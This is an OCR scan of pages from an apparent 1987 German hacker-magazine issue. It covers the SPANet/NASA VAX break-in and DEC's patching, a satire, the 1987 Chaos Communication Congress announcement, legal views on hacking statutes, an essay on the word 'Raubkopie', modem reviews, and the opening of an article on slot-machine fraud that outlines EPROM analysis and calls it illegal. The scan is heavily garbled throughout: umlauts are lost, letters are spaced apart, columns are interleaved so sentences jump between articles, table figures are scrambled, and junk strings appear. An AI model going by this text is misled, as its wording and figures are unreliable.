"Das darf doch gar nicht w a h r sein, m a g sich manch einer gedacht haben, als bekannt w u r d e , da eine kleine G r u p p e deutscher H a c k e r weit ber lOORechnerimwissenschaftlichen S P A N e t geknackt haben, d a r u n t e r so " k a p i t a l e " Systeme wie die der N A S A oder des Kernforschungszentrums C E R N in Genf. D a s d a r f doch nicht w a h r sein, w i r d m a n vor a l l e m bei D E C gedacht haben. Denn smtliche geknackten R e c h n e r w a r e n V A Xen unter V M S . U n d gerade V A X / V M S hatte D E C doch immer als eines d e r sichersten Betriebssysteme berhaupt bezeichnet. E i n e Einschtzung, die brigens auch das amerikanische Verteidigungsministerium teilte. Warder"Superhack" ein Jux? Eine kri minel le Handlung? Oder war es gar eine ausgewachsene Spionage-Affre, wie der britische Guardian argwhnte? "Super-Stoff fr Ost-Agenten", so meldet auch "Bild", sei den Hackern in die Finger geraten. John le Carre lt gren. Spionage war das sicher nicht - dazu haben diese Hacker einfach nicht das Format. Ganz im Gegenteil, sagt auch der Chaos Computer Club. Sie wollten auf Sicherhettslcken aufmerksam machen. Soein schnes Motiv. Schade, da sie es erst bekanntgegeben haben, nachdem sie sowieso entdeckt worden waren. Lassen wir uns doch nichts vormachen. D a haben junge Leute mit Computer und Modem gespielt hier und da auch mal einen Rechner geknackt. Dann kam berdie elektronische Post ein neues Spielzeug. Kein Schaukelpferd, ein trojanisches. Solch neues Spielzeug will ausprobiert sein, und das SPANet bot sich als Spielwiese geradezu an. Es mu die DEC-Leute hart getroffen haben. Nie werden sie mde, die Offenheit ihrer VAXArchitektur zu betonen. Und nun kommt die Besttigung ausgerechnet aus der falschen Ecke. Aber D E C ist selber schuld. Nicht unbedingt wegen des Fehlers im Betriebssystem - das sollte zwar nicht passieren, aber welches groe Software-Produkt ist schon vollkommen fehlerfrei? Vorwerfen mu man D E C vielmehr, da der Hersteller auch nach Bekanntwerden des Fehlers - und das ist immerhin schon einige Monate her - nicht sofort reagierte.

(SZ) - Neulich saen sie wieder zusammen, die J u n g s vom Chaos-Computer-Club in H a m b u r g , spezialisiert a u f E i n b r c h e in Elektronenhirne aller Art, u n d hackten u n d zapften/drahteten u n d kabelten/schalteten u n d walteten. Einer las ghnend Volkszhlungsdaten eines Statistischen Landesamtes, der zweite schmuggelte mittels eines Ostberliner Redaktionssystems das Wort Glasnost in den Aufmacherdes Neuen Deutschland vom nchsten Tag, der dritte versuchte die KetchupFormel eines internationalen Hamburger-Konzems zu finden. Da rief der vierte: "Mnsch, ich bin bei der N A S A ! " Die anderen sprangen herbei, und richtig, da stand auf dem Bildschirm: "Guten Tag, hier ist die amerikanische Raumfahrtbehrde." Zwar handelte es sich blo, wie sich herausstellte, um den elektronischen Abfallkorb der N A S A , in den man vorgedrungen war, aber man wei ja, da es die Abfallprodukte der Weltraumforschung in sich haben. "1) Teflonpfanne" stand da, "2) Schwerkraftunabhngiger Kugelschreiber". Dann kam es: "3) Rauchfreie Zigarette".

D E C in Zahlen (Alle Angaben in M i o D M )

1983 Teilkonzemumsatz Vernderung in % Beschftigte Bilanzsumme


Grandkapital Rcklagen Sachanlagcn Beteiligungen Liquide M i l t c l Personalaufwand Investitionen Jahresberschu

1984 616 +34 1886 367 20


-

1985 913 +47 2456 485 40 6 62

1986 1092 +20 305S 533 85 6 115

Manager, fr die Sicherheit ihrer Rechner zu sorgen. U n d diese Pflicht wird gerade in Forschungseinrichtungen oft aufs Grbste vernachlssigt. Forscher wollen forschen, und daher ist es nicht selten, da ein Student das System managt - so nebenbei. Es soll auch heute noch Rechner unter V M S 4.4 und 4.5 geben, auf denen die DEC-Patches nicht installiert sind. Wenn ich einem Einbrecher meinen Hausschlssel gebe, darf ich mich nicht wundern, wenn anschlieend etwas fehlt. Mittlerweile hat D E C den Fehler behoben. Die notwendigen Patches sind ausgeliefert, eine neue VMSVersion steht ebenfalls seit einiger Zeit zur Verfgung. V M S ist wieder eines der sichersten Betriebssysteme der Welt. Das war es tatschlich auch vorher schon, die Einschtzungen von D E C und dem Dod (Departmentof Defense) waren sofaisch nicht. Es gibt kein Betriebssystem, in das Hacker nicht eindringen knnten, wenn sie es nur wirklich wollen. Da es gerade D E C getroffen hat, hat eigentlich nur einen Grund: D i e anderen Betriebssysteme waren den Hackern nicht interessant genug. Auerdem - wo findet man sonst noch so ausgedehnte Netze? Insofern war der Superhack ein Kompliment fr D E C . Hat er D E C denn nun eigentlich geschadet? Ein wenig am Image hat er schon gekratzt - das ist halt so eine dumme Eigenart negativer Schlagzeilen. Aber schauen wir uns doch einmal einen der sensibelsten Sensoren an - Wall Street. Der Aktienkurs von D E C hat nicht den geringsten Rckschlag hinnehmen mssen. I m Gegenteil."

461

+6
1490 233 8 12 32
-

38
8 117 25 4.7

10 101 17 1.8

17 156 53 7,5

19 211 91 10,3

Dem folgenden Text war zu entnehmen, da sich in den Siebziger Jahren eine Forschungsgruppe mit der Frage beschftigt hatte, wie man Astronauten auch whrend eines Weltraumfluges das Rauchen ermglichen knnte. Die Zigarette drfte, so hie es, erstens keine Asche hinterlassen, weil in der Kapsel kein Platz fr Aschenbecher sei, und sie drfte zweitens keinen Rauch entwickeln, denn der Blick auf die Sterne msse frei bleiben. Ein geheimer Forschungsauftrag wurde an die amerikanische Zigarettenfirma R.J. Reynolds vergeben, deren Technikern das unmglich Erscheinende gelang: Tabak ersetzten sie durch Tabakextrakt, Geschmacksstoffe, Glyzerin und hnliche Leckereien, ein Kohlestck an der Spitze sorgtefr glhend heieLuft zum Einatmen. Leider verschwand die Erfindung dann im NASA-Computer, weil der amerikanische Geheimdienst herausgekriegt hatte, da die Russen Nichtraucher als Astronauten einsetzten, um sich einen Vorsprang im All zu verschaffen. Nun ist die Sache doch an die ffentlichkeit gekommen. Als die N A S A entdeckte, da Hamburger Chaoten bei ihr eingedrungen waren, informierte sie

nolds, der unverzglich eine Pressekonferenz einberief und bekanntgab, seine Firma wolle mit einer rauchlosen Zigarette den von militanten Nichtrauchern bedrngten US-Markt erobern. Die N A S A erwhnte er nicht. Das war am Montag, gerade ein Tag, bevor die Hacker aus Hamburg mit ihrer Pressekonferenz so weit waren. W e r sollte ihnen die Wahrheit noch glauben? Sie berichteten also blo allgemein von einer geknackten NASA-Datenbank Namens Space Physics Analysis Network und erwhnten den Abfallkorb nicht. Aber Lesern, welche die Zusammenhnge hinter den Nachrichten des Tages suchen, verraten wir mehr: Es ist kein Zufall, da - ebenfalls am Montag dieser Woche - das Batelle-Instilut (Frankfurt) etwas hektisch die Erfindung einer schmelzfesten Schokolade fr Kinder bekanntgab.

Thomas Hertel (stellvertretender Chefredakteur) (^^^Jbic SmicnSdjicuba

sofort den Vorstandsvorsitzenden von R.J. Rey-

Quelle: Sddeutsche Zeltung, 17.9.87 StatcnMiieufccr

Seite 8

Seite 9

Die internationale Hackerparty


Chaos Communication Congress 1987

Z u m viertem M a l veranstaltet der C C C in H a m burg seinen C o m m u n i c a t i o n Congress. W i e schon in den vergangenen J a h r e n treffen sich zwischen den Feiertagen Daten reisende, Telefonfreaks, Informationspfadfinder, Funkmaniacs, Netzflaneure, Bitniks, H a c k e r und H a c k sen z u r Internationalen H a c k e r p a r t y . Entgegen anderslautenden Verffentlichungen startet der Congress a m Sonntag dem 27. Dezember u m 10 U h r u n d endet a m M o n t a g dem 28. Dezember gegen 2 1 - U h r . Veranstaltungsort ist, wie in den vergangenen J a h r e n , das Eidelstedter Brgerhaus, Elbgaustrae 12, i n H a m b u r g Eidelstedt.

trgem ist, wie in den vergangenen Jahren, aus Datenschutzgrnden untersagt. I m Rahmen der Pressearbeit werden TV-Teams anwesend sein. Nicht ausgeschlossen weiden kann, da staatliche Dienststellen den Congress als Datenregister verwenden mchten. AusdiesemGrund sollte jeder Teilnehmer dementsprechend vorsichtig sein. Die Projektleitung wird tglich eine berprfung auf Verwanzung vornehmen und ein Frhwarnsystem fr grere Polizeiaktionen vorbereiten. Fr alle Flle werden mehrere Anwlte der Veranstaltung beiwohnen. Alle Teilnehmer bentigen dieses Jahr ein Pafoto fr den Congress-Ausweis. Die Congress-Ausweise haben sich bei der letztjhrigen Bombendrohung und der anschlieenden Rumung als uerst ntzlich erwiesen. Mindeijhrige erhalten gekennzeichnete Congress-Ausweise und mssen die Rume bis 22 Uhr verlassen (Jugendschutzgesetz). Die Teilnahmegebhr betrgt fr Mitglieder

Hier nochmal die wichtigsten Telefondaten:


Vorbereitung: CCC-Geschftsstelle: 040-490 37 57 Btx-Redaktion (Congressorganisation): 37 52

040-48

C L I N C H - M a i l b o x ( 3 8 n l D ) : 040-632 35 17 Durchfhrung: Congressmailbox ( 3 8 n l D ) : 040-570 40 65 Congressredaktion (Pressestelle): 040-570 56 96 Projektleitung und V e r m i t t l u n g : 040-570 57 08 Der Chaos Computer Club hofft auf rege Teilnahme, so da wie in den vergangenen Jahren Communication und Information im Vordergrund der Veranstaltung stehen.

"Offene Netze - Jetzt!"


Der Congress steht dieses Jahr unter dem Motto: "Offene Netze - Jetzt". Weiterhin geht es um "Hacker und Staat" (Hintergrnde der Nasa-Story, Panikmanagement beim C C C , Bundespolizei undHacker, sowie einer Diskussion ber Perspektiven der Hacker-Szene). Juristische Workshops erlutern die "Tarife frs Hacken". Weiterhin Infos ber Verschlsselung und Verschleierung. Vorgestellt wird auch ein neues Konzept zur Vernetzung von Mailboxsystemen (BtxNet). Der genaue Congressfahrplan wird erst Mitte Dezember vorliegen und dann sogleich ber die Netze verbreitet. Spannung und A k t i o n werden jedoch garantiert. W e g e n der sehr schlechten Terminlage - kurz nach Weihnachten - beginnt der Aufbau am Congress-Ort schon a m Donnerstag dem 24. Dezember. A m Vormittags des Heiligen Abend wird die Telekommunikations-Infrastruktur (internes Telefon- u n d Datennetz) verlegt. A m i . und 2. Weihnachtsfeiertag wird der Congress eingerichtet. Helfer und Referenten knnen ab dem 24. Dezember am Tagungsort eintreffen. Auswrtige Gste werden ab Samstag (2. Weihnachtsfeiertag) eingelassen und erhalten abends ihre Schlafpltze zugewiesen. bernachtungsmglichkeiten werden von Samstag bis M o n t a g bereitgehalten. Der dgenlikh Labyrlnthnysugmos

S.Wernery 291914 Nov 87 BEREICH RED CONGRESS CCC87

( C C C e V ) und Mindeijhrige D M 15,-, fr Pressevertreter D M 50,- und fr alle anderen D M 20,-. Die Betrge knnen zuknftig nur so gnstig gestaltet W i e in den vergangenen Jahren bietet die D A T E N S C H L E U D E R - R e d a k t i o n angehenden Redakteuren Zugriff auf das Redaktionsarchiv und unseren Schnellkopierer. Neu ist eine eigenstndige Congressredaktion, in der aktuelle Meldungen fr die ffentlichen und internen Netze erstellt werden. In diesem Jahr wird der C C C erstmals mehrfach tglich auch mit einem eigenen Fernsehsender (Amateurfunkfernsehen) vom Congress berichten. Aus der Congress-Mailbox knnen Daheimgebliebene die aktuellen Meldungen vom Congress abfragen (Eventuell knnen die Meldungen auch ber Btx abgerufen werden). I m Hack-Center stehen mehrere Telefonleitungen bereit, um einen freien Zugang zu den internationalen Datennetzen zu ermglichen. Fr Frhstck und Kaffee bietet das Chaos-Cafe wieder seineDienste an. Desweiteren finden Referate, Diskussionen und Demonstrationen in den Workshops im Theater und den Konferenzrumen statt. werden, wenn nicht wie im letzten Jahr Telefone und Modems im Wert von ber D M 2000,- verschwinden! W i r rechnen dieses Jahr mit 400 bis 600 Teilnehmerinnen. Eine rechtzeitige Voranmeldung sichert auch bei berfllung noch den Einla. Voranmeldung durch Einzahlung auf Postgiro ( B L Z 200 100 20) Konto 599090-201 fr den C C C e V . Bitte den Beleg mitbringen! Schlafpltze sollte man sich privat besorgen. Wer es sich leisten kann, dem sei ein preiswertes Zimmer auf der Reeperbahn (da gibts nachts noch was zu beien) empfohlen. Fr Ausnahmeflle hat der C C C mehrere Nachtlager (Schlafsack) von Samstag bis Montag in petto. jA b Heiligabend ist die Congress-Mailbox unter der Rufummer 040-5704065 ( 3 8 n l d ) eneichbar. Die Congressredaktion beantwortet Fragen zum inhaltlichen Geschehen unter der Rufnummer 0405705696. Die Projektleitung und Vermittlung ist unter 040-5705708 erreichbar. Weitere Informationen knnen i m Vorfeld ber die CLINCH-Mailbox 040-6323517 ( 3 8 n l D ) abgerufen werden. D i e C C C Geschftstelle ist unter 0404903757 erreichbar. Fr Referenten und Organisationsfragen ist die Btx-Redaktion unter 040-483752 ( V O I C E ! ) erreichbar. liJNOOH O N "-1 corrEE .tuo CiiMKTCj [riOMQE__J

Der Congress wanzt


Wegen der technischen Demonstrationen gelten die Rumlichkeiten als "Elektrisches Labor", zu dem nur Unterwiesene Zutritt haben. Jeder Teilnehmer hat sich bei rtlichen Funkamateuren / Elektronikern etc. vorher fachkundig zu machen. Das Fotografieren sowie das Aufzeichnen mittels Ton- und Bild-

o
( ^ f ^ j p i c Btcn8d)lcul)cr

mum

or

PART TWO t

mm

'Iffy

SUWML

Seite 10

Seite 11

SxncitSii)Icuhcr

Congressredaktion
Die C C C P r e s s e s t e l l e a m Congress

Congress-Mailbox Die Congress-Mailbox ist unter der Rufnummer 040/-5 f tc65z\i erreichen. Sie ist zum einen die Schnittstelle nach auen und gleichzeitig das elektronische Informationsmedium des Congresses. Es ist ein stndliche ablaufendes Intermail zwischen FIDO-Net, Congress-Mailbox und anderen Netzen vorgesehen. Mit diesem Service soll versucht werden, von auen kommende Informationen direkt in laufende Veranstaltungen einzubringen. BoxBetreiber im FIDO-Net sollten sich berlegen, ob Sie fr die Zeit des Congresses ein Brett CCC87 einrichten wollen. Aus Kapazittsgrnden ist eine Ubersetzung ins Englische nicht mglich. Wer interessante Informationen bersetzen und auf die Internationale Ebene hieven will, sei dazu herzlich aufgefordert. Smtliche Meldungen haben Netzwerkfreigabe. M a i l b o x - D r u c k e r (Hardcopies fr Pinnwand) Smtliche von der Congress-Redaktion produzierte Meldungen, sowie allelnformationen die ber F I D O und andere Netze ankommen, werden als Hardcopy an eine Pinnwand vor der Congress-Redaktion ausgehngt. Damit hat jeder Congress-Teilnehmer die Mglichkeit, sich einen berblick zum gesamten Nachrichtenaufkommen zu verschaffen. Amateurfunkfernsehen Vorgesehen ist eine Direktbertragung laufender Veranstaltungen. Sofern keine Veranstaltungen laufen, ist daran gedacht, vorproduzierte Videobnder einzuspielen. Zudem sind kurze Nachrichtenblocks geplant, die von einem Sprecher verlesen werden. D i e Nachrichten liefert die Congress-Redaktion. Dar der Nachrichtenblcke max. fnf Minuten. In den Sendepausen wird die Congress-Mailbox auf den Sender geschaltet. Die Congress-Redaktion (Pressestelle) hat einen eigenen Telefonanschlu. U n t e r der R u f n u m m e r 040/570 56 96 werden Presseanfragen beantwortet. Zudem bernimmt die Redaktion in diesem Jahr die Organisation fr Interviews.
c

anstaltungsthemen. Diese Meldungen werden in die Congress-Mailbox eingespielt und haben in der Betreffzeile die Kennung CCC87: In diesem Jahr werden alle Referenten gebeten, von ihrem Vorbereitungsmaterial eine Kurzfassung zu schreiben, bzw. ihre Texte der Congress-Redaktion zur Verfgung zu stellen. Whrend der laufenden Veranstaltungen werden diese Inhaltsangaben in die Congress-Mailbox eingespielt.

Merkwrdig

H a m b u r g ( C C C 8 7 ) - Die Congress-Redaktion hat fr dieses J a h r eine u m f a n g r e i c h e Berichterstattung vorbereitet. V o m 26. bis einschlielich 28. Dezember werden w i r aktuelle M e l d u n gen, Hintergrundberichte, Features, D o k u m e n tationen, den Pressespiegel u n d bei B e d a r f Interviews anbieten. Dieser neue Congress-Service dient in erster Linie z u r internen K o m m u n i k a tion, w i r d d a r b e r hinaus a b e r auch f r Presse, F u n k u n d Fernsehen produziert. Z u d e m soll getestet werden, inwieweit es gelingt, f r die D a u e r des Congresses eine eigene M e d i e n - I n f r a s t r u k t u r aufzubauen und zu beliefern. M i t g r e r e n K a tastrophen ist zu rechnen. Z u r V e r b r e i t u n g stehen folgende M e d i e n z u r V e r f g u n g : - Congress-Zeitung - aktueller Tagesdienst (?) - ggf. Bildschirmtext - Congess-Mailbox - Mailboxdrucker (Hardcopies fr Pinwand) - Amateurfunkfernsehen Congress-Zeitung Die Congress-Zeitung ist auch in diesem Jahr eine Sonderausgabe der D A T E N S C H L E U D E R . W i r werden uns bemhen, die Congress-Zeitung whrend der laufenden Veranstaltung zu produzieren. Die Congress-Zeitung wird die interessantesten Meldungen aus dem allgemeinen Nachrichtenangebot enthalten. aktueller Tagesdienst Sofern notwendig und technisch zu realisieren, werden zwei mal tglich Kurzmeldungen mit einer Zusammenfassung der wichtigsten Ereignisse als DINA-4 Fotokopie unter den Congress-Teilnehmern verteilt. Beabsichtigt sind bis zu acht Kurzmeldungen a neun Zeilen. Darber hinaus sollen bei Bedarf auch die CCC87-Pressemitteilungen verteilt werden. ggf. Bildschirmtext Eine Auswahl des aktuellen Tagesdienstes, aufbereitet mit zustzlichen Informationen werden ggf. im Bildschirmtext angeboten. Der Btx-Dienst wird zustzlich auf der Congress-Mailbox im Brett Chaos unter der Betreffkennung CCC87/btxr eingespielt.

Eines schnen Tages klingelt unser nettes, weisses Telefon. Ein Herr meldet sich plump vertraulich und wollte einen 'Einfhrungskurs' ins Hacken haben. Er bot Geld. Wir hatten gerade keine Zeit und baten zur Terminvereinbarung um seine Telefonnummer. Er ziehe gerade um und wrde sich wieder melden, sagte der Unbekannte. W i r haben nie wieder etwas von ihm gehrt.

+ A C H T U N G : Presserechtlich gilt das gesprochene W o r t + Sofern wir personell dazu in der Lage sind, werden Mitglieder der Congress-Redaktion gezielt an den Veranstaltungen teilnehmen und das Wesentliche protokollieren. Diese Informationen werden als Zusammenfassung des Diskussionsverlaufs ebenfalls in die Congress- Mailbox eingespielt. Im Rckkinal werden wir Anfragen, Beitrge und inhaltliche Anmerkungen, die uns ber die Congress-Mailbox zugeschickt wurden, stellvertretend in die laufenden Veranstaltungen einbringen. Zwischendurch wird die Box mit bunten Meldungen vom Rande des Congresses beliefert. Wichtige Ereignisse werdn als Kurzmeldungen verbraten. Je nach Bedarf, werden wir kurze HintergrundInformationen aus dem umfangreichen CCC-Archiv einspielen.

padeluun CLINCH/CH AOS/PAD ELUUN/25.11.87/23:15/404 Z.

Stoepsel verffentlichte in der letzten D A T E N S C H L E U D E R zwei A r t i k e l zu Hackern und Gesetzen ("Die neuen T a r i f e frs Hacken"). Hier nun eine Gegenmeinung in K u r z f o r m . Z u 202a: Es ist entscheidend, was man unter "verschaffen von Daten" versteht. Christoph Biihler definiert es wie folgend: "Grundstzlich versteht man hierunter die bernahme der tatschlichen Verfgungsgewalt und des wirtschaftlichen Wertes zu eigenen Zwecken (bzw. bei Var. 2 die bernahme fr einen Dritten und des wirtschaftlichen Wertes zu eigenen Zwecken des Dritten." weiter fhrt er aus: "Daher sind beispielsweise auch die sog. "Hacker", die sich mit einem bloem Kenntnisverschaffen begngen, straffrei nach 202a Stgb." (Zitiert nach: Christoph Bhler, " E i n Versuch, Computerkriminellen das Handwerk zu legen". Das Zweite Gesetz zur Bekmpfung der Wirtschaftskriminalitt, M D R 6/1987)

Personelle Besetzung Fr die Congress-Redaktion werden noch vier fhige Mitarbeiter gesucht. Voraussetzungen zur Mitarbeit sind: - Starke Nerven und die Fhigkeit, auch i m Untergang den berblick zu halten. - Eigenstndiges Arbeiten i m T e a m mit der Fhigkeit, zwischen Informationsgerll und Wesentlichem unterscheiden zu knnen. - Meldungen schnell schreiben zu knnen. - Eine ordentliche Portion Humor und Kreativitt. - sowie die Fhigkeit, Wunder zu vollbringen.

Das Meldungsangebot im Einzelnen:


Wir beginnen am 26. Dezember mit einer Auftaktmeldung (60 Zeilen) und einigen vorbereiteten, zeitlosen Features bzw. Hintergrundberichten. Vorgesehen ist ein Hintergrund z u m Amateurfunkfernsehen, sowie Einfhrungsbeitrge zu wichtigen Ver-

Zu 303b: "Gestrt" ist das entscheidende Wort. Wann ist eine DV-Anlage gestrt? Die NASARechner sind wegen der Trojanischen Pferde nicht gestrt, nicht einmal in ihrer Funktion beeintrch-

jwl 011256 Dez 87 BEREICH KONGRESS CRED1

tigt, eher um Funktionen erweitert. asterix

. ( ^ j f ^ p i c 2><i/ciiiif;lciilcr

Seite 12

Seite 13

Begriffsvernebelung
Zum Thema Raubkopieren

i,h c o

BBE3E1B nannH B m a n onn

Modem: Lightspeed 2400c


Vertrieb: Fa. M P I , Aachen Vorteile: kann 300 Baud C C I T T (das ist bei einem 2400-Baud-Modem eine Seltenheit). Kann 1200/75 (und 75/1200) Baud. Baudratenwandlung bei 1200/75. Gutes Manual. Helpscreen eingebaut. Speicher fr die Konfiguratuion des Modems. Zwei Telephonnummern-Speicher. Nachteile: die Baudratenerkennung bei Autoanswer klappt ganz gut, nur mit einem Modem hatten wir Probleme (Besitzer eines Zellcon-Modems sollten ihr auf B E L L Norm stellen, bevor sie eine Box mit diesem Modem anrufen). Die Erkennung der Besetztzeichens funktioniert nicht (das 1200er bringt das). Im Manual ist nirgends erwhnt, wie man auf 1200/75 stellt ( " A T B 2 " wute der Vertrieb anfangs auch nicht aber jetzt scheint ein Beipackzettel dabei zu seien). Fr 1200/75 mit B T X mu man das Modem auf " A T X 0 " stellen, sonst kriegt man keine Verbindung. Das Modem ist etwas zu leise (output -lOdBm). Wertung: gut (die Nachteile lassen sich mit NowH o w aufheben). Bemerkung: Angeblich sind noch alte Modems des Typs Lightspeed 2400 - also ohne das "c" - im Umlauf. Hnde weg davon! Noch ein bichen was ber die Emfindlichkeiten und den Outputlevel der Modems. Er wird in dBm (dezibel) gemessen und ist ein Ma fr die Dmpfung einer Tfelefonleitung (Postler mgen mir bitten meinen Dilettantismus verzeihen). Der negative Wert z.B. bei der Angabe des Outlevel ist ein Ma fr die Ueberwindung der Dmpfung - je mehr negativ, desto lauter (=emfindlicher) das Modem. Postmodems haben Werte von Output =-15dBm / Input = -40dBm, sind also lauter, und unemfindlicher gegenber Strungen als die Hayesmodems. WirbittendieHersteller,das zu bercksichtigen und die Modems zumindest umschaltbar zu machen. E i n Fehler, der bisher bei allen Hayes-Modems (auer LS 2400c) aufgetreten ist: Wenn man Autoanswer hardwaremig (oder wie auch immer) eingestellt hat und der D T R auf N U L L zieht, kann es sein, da bei einem Anruf in dieser Zeit das Modem ganz kurz abhebt und sofort wieder auflegt. Was soll der Mist? Der einzige, der davon profitiert, ist die POST. Ha... Also liebe Hersteller es gibt noch was zu tun.

I n der letzten D A T E N S C H L E U D E R fand sich ein A r t i k e l z u m T h e m a " R a u b k o p i e r e n " . Als Verfasser zeichneten Caesar/Stpsel. W a s das "/Stpsel" angeht, hat mich die R e d a k t i o n durch ein Versehen m i t Federn geschmckt, die m i r mangels Urheberschaft nicht zustehen. Ich m u mich aber, vor allem in Bezug a u f die Gesamttendenz, von dem A r t i k e l distanzieren, mchte das aber jetzt nicht i m einzelnen errtern. D a gegen will ich die Aufmerksamkeit lieber a u f einen bisher vllig vernachlssigten Aspekt der Raubkopierer-Diskussion lenken: Den Begriff " R a u b k o p i e " bzw. " R a u b k o p i e r e r " . Denn: ES GIBT WEDER "RAUB"-KOPIEN, NOCH "RAUB"-KOPIERER! Ist das Koieren also frei u n d erlaubt? Nein, obwohl bei weitem nicht fr jedes Programm, bei dem das behauptet wird, ein Urheberrechtsschutz besteht. Wogegen ich mich entschieden wende, ist allein der Begriff "Raubkopie". E r rckt ein einfaches Vergehen in die Ecke des Verbrechens und der Gewalkriminalitt. Denn unterRaub versteht der Jurist die W e g n a h m e einer fremden beweglichen Sache unter A n w e n d u n g von (krperlicher) Gewalt oder von qualifizierten Ntigungsmitteln, d.h unter Droh u n g m i t gegen wniger Gefahr fr Leib oder Leben. Dies trifft aber - wie jeder wei - auf die sog. " R a u b k o p i e n " in keiner Weise zu. Gemeint ist doch das illegale Ziehen von Kopien urheberrechtlich geschtzter Progamme. Ein Programm ist aber schonkeine"Sache", sondern einegeistigeLeistung. Sache ist n u r der (dem Kopierenden gehrende) Datentrger, a u f dem das Programm gespeichert ist. Das mag m a n vielleicht noch als bertriebenen juristischen Feinsinn abtun. Dies ndert jedoch nichts daran, da die illegal gezogenen Kopien nicht mittels G e w a l t oder unter Einsatz von qualifizierten Ntigungsmitteln beschafft werden. Von R a u b kann daher keine R e d e sein. Selbst wenn ausnahmsweise einmal eine Prof-rra

niaos

na nnas m na 0 0 E1EIBC3 H B l EDHEEG] ia bei a n

m aaa

Stiftung Modemtest
hat mal wieder zugeschlagen

Was heisst hier "Falsche Eingabe " ?

Hier wird durch den gezielten Einsatz von flschen Begriffen versucht, ein v o m Gesetz mibilligtes Verhalten noch weit darber hinajis zu geieln und die Tter zu diskriminieren. Selbst die bei der Wahrnehmung ihrer Interessen oft wenig zimperlichen Einzelhndler haben es nicht versucht - und schon gar nicht geschafft - die Ladendiebe als Ladenruber zu verunglimpfen. Unverstndlicherweise muckt niemand auf gegen diesen Verbalterrorismus der Software-Hersteller. Selbst im juristischen Schrifttum und in der Rechtsprechung wird der Begriff "Raubkopie" vllig kritiklos bernommen. Darum gilt mein Respekt (und meine Verachtung) der PR-Arbeit der Sftwarehuser. Gute Arbeit. W e n n die Programme auch nur annhernd so perfekt wie die P R wren, dann wrde es bestimmt auch weniger "Raub"-Kopien geben...

M o d e m : L y n k e r ' s 1200 Vertrieb: Fa. C - L O G , Mnchen Vorteile: kleinere Abmessungen; zwei Telephonkabel und ein RS232-Kabel dabei. Nachteile: Kleines Menual (zwar sind alle Befehle mal erwhnt, aber die Bedeutung einiger Bits der Statusregister schon nicht mehr). Das Ermitteln der Baudrate bei Autoanswer geschieht wie beim Wellcon mit einem 600 Baud-Carrier, manche Gegenstationen connecten da nicht. Komischerweise konnte manchmal keine Box bei 300 Baud erreicht werden; ein Umstellen auf BELL-Norm half manchmal. Das Modem ist etwas zu emfindlich und etwas zu leise (input -50dBm; outpyt -lOdBm). Wertung: Gibt besseres. M o d e m : L y n k e r ' s 2400 Vertrieb: Fa. C-Log, Mnchen Vorteile: kann 300 Baud C C I T T (das ist bei einem 2400-Baud-Modem eine Seltenheit). Kann 1200/75 (und 75/1200) Baud. Zwei Telephonkabel und ein RS232-Kabel dabei. Nachteile: bei 1200/75 ist keine Wandlung drin, d.h., ihre Schnittstelle mu mit zwei unterschiedlichen Baudraten gefahren werden; das knnen leider die wenigsten (glcklich ist, wer da einen ST hat). Die Baudratenerkennung bei Autoanswer funktioniert nicht richtig (laut Hersteller wird daran gearbeitet). Z u kleines Manual (s.o.). Keine Dipswitches am Modem, um eine Grundeinstellung beim Einschal ten zu haben. Das modern ist etwas zu emfindlich und etwas zu leise (input -49dBm; Output -lOdBm). Wertung: Bedingt einsatzfhig.

g r a m m k o p i e geraubt wrde, sollte man von einer geraubten K o p i e und nicht von einer "Raubkopie" sprechen. M a n sagt j a auch "gestohlenes A u t o " und nicht "Stehlauto".

Stoepsel CLINCH/DS-RED/STOEPSEL/26.11.87/14:51 /3398 Z.

Hackowltz
CLINCH/SYSOP/GAST/08.11.87/21:23/3574 Z.

S i e SntcnSrfjicubcr

Seite 14

Seite 15

( j f f ^ r p i c EnfcnSifjlcuticr

Goldesel streck Dici.


Computerbetrug am Automaten r

Wege zu Wohlstand u n d R e i c h t u m schienen sich zu erffnen, als Zeitungen die ersten Berichte ber " C o m p u t e r f r e a k s " brachten, die dem Geheimnis des Glcks a m Spielautomaten a u f die Spur gekommen waren. Gerchteweise w a r dies folgendermaen zu bewerkstelligen: M a n brauche mit dem P r o g r a m m in der Hosentasche n u r zum richtigen Z e i t p u n k t dem G e r t den Befehl "Goldesel streck Dich" geben, und schon knne man mit einer Plastiktte den Geldsegen auffangen. U n d das alles legal. So oder so hnlich jedenfalls las sich das in einem T e i l der Presse, die freudig das neue T h e m a aus dem Bereich "datenwtige Jugend" aufgriff. Zumindest seit dem Inkrafttreten des 2. W i K G (Zweites Gesetz zur Bekmpfung der Wirtschaftskriminalitt vom 1:8.1986) kann man diesem Weg jedenfalls niemandem mehr als legalen Weg zur Vermgensbildung empfehlen. Mehr als 500 Verfahren sind zur Zeit - nach Informationen der Zeitschrift "Computer und Recht" (CR) Nr.8/1987 - in der Bundesrepublik in solchen Sachen anhngig. Wie stellt man es nun eigentlich an, dem Glck in die Karten zu schauen? Alle moderneren Geldspielautomaten sind mit einem Zentralrechner (CPU) ausgestattet, der mit einem EPROM-Chip bestckt ist. Da dort das Programm des Spielablaufs verborgen ist, ist dieses wertvolle Stck auch in der Regel durch ein Blechgehuse gegen Zugriffe oder Beschdigungen geschtzt. Den EPROM-Chip mu man nun zunchst in seine Gewalt bringen, um dann das Spieleprogramm auf einem Computer einer Analyse zu unterziehen. Mit Hilfe dieser Analyse ist der Programmablauf vorhersehbar. Die Tasten des Automaten lassen sich gezielt und fr den jeweiligen Spieler nutzbringend bettigen. Der Gesetzgeber hat nun - vor allem in das Strafgesetzbuch - so manche Vorschrift eingebaut, die unteranderemauch den experimentierfreudigen jungen Leuten Grenzen in der scheinbar grenzenlosen Welt der Daten setzt: Da die zuvor beschriebene Vorgehensweise nicht legal ist, liegt auf der Hand. Ohne Sachbeschdigung drfte man kaum in den Besitz des EPROM-Chips kommen, da ja der Automat abgeschlossen ist und auch das schtzende

